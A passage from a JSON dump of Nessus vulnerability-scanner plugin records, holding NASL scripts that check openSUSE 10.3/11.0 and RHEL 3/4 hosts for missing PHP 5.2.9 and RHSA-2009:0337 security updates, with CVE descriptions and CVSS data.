reference:\"php5-iconv-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-imap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-json-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-ldap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-mbstring-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-mcrypt-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-mhash-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-mysql-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-ncurses-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-odbc-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-openssl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pcntl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pdo-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pear-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pgsql-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-posix-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-pspell-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-readline-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-shmop-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-snmp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-soap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sockets-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sqlite-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-suhosin-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sysvmsg-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sysvsem-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-sysvshm-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-tidy-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-tokenizer-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-wddx-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-xmlreader-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-xmlrpc-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-xmlwriter-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-xsl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-zip-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-zlib-5.2.9-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T14:03:02", "description": "php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : apache2-mod_php5 (apache2-mod_php5-593)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-dbase", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-ncurses", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-hash", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-ldap"], "id": "SUSE_11_0_APACHE2-MOD_PHP5-090312.NASL", "href": "https://www.tenable.com/plugins/nessus/39916", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-593.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39916);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_php5 (apache2-mod_php5-593)\");\n script_summary(english:\"Check for the apache2-mod_php5-593 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=471419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=480948\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"apache2-mod_php5-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-bcmath-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-bz2-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-calendar-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-ctype-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-curl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-dba-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-dbase-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-devel-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-dom-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-exif-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-fastcgi-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-ftp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-gd-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-gettext-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-gmp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-hash-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-iconv-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-imap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-json-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-ldap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-mbstring-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-mcrypt-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-mysql-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-ncurses-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-odbc-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-openssl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pcntl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pdo-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pear-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pgsql-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-posix-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-pspell-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-readline-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-shmop-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-snmp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-soap-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sockets-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sqlite-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-suhosin-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sysvmsg-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sysvsem-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-sysvshm-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-tidy-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-tokenizer-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-wddx-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-xmlreader-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-xmlrpc-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-xmlwriter-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-xsl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-zip-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"php5-zlib-5.2.9-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:06:33", "description": "Updated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.", "edition": 29, "published": "2009-04-07T00:00:00", "title": "RHEL 3 / 4 : php (RHSA-2009:0337)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557"], "modified": "2009-04-07T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-pear", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:php-domxml", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "id": "REDHAT-RHSA-2009-0337.NASL", "href": "https://www.tenable.com/plugins/nessus/36097", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0337. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36097);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_bugtraq_id(30649, 31612, 32948, 33002, 33542);\n script_xref(name:\"RHSA\", value:\"2009:0337\");\n\n script_name(english:\"RHEL 3 / 4 : php (RHSA-2009:0337)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3658\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5498\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-0754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:0337\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", 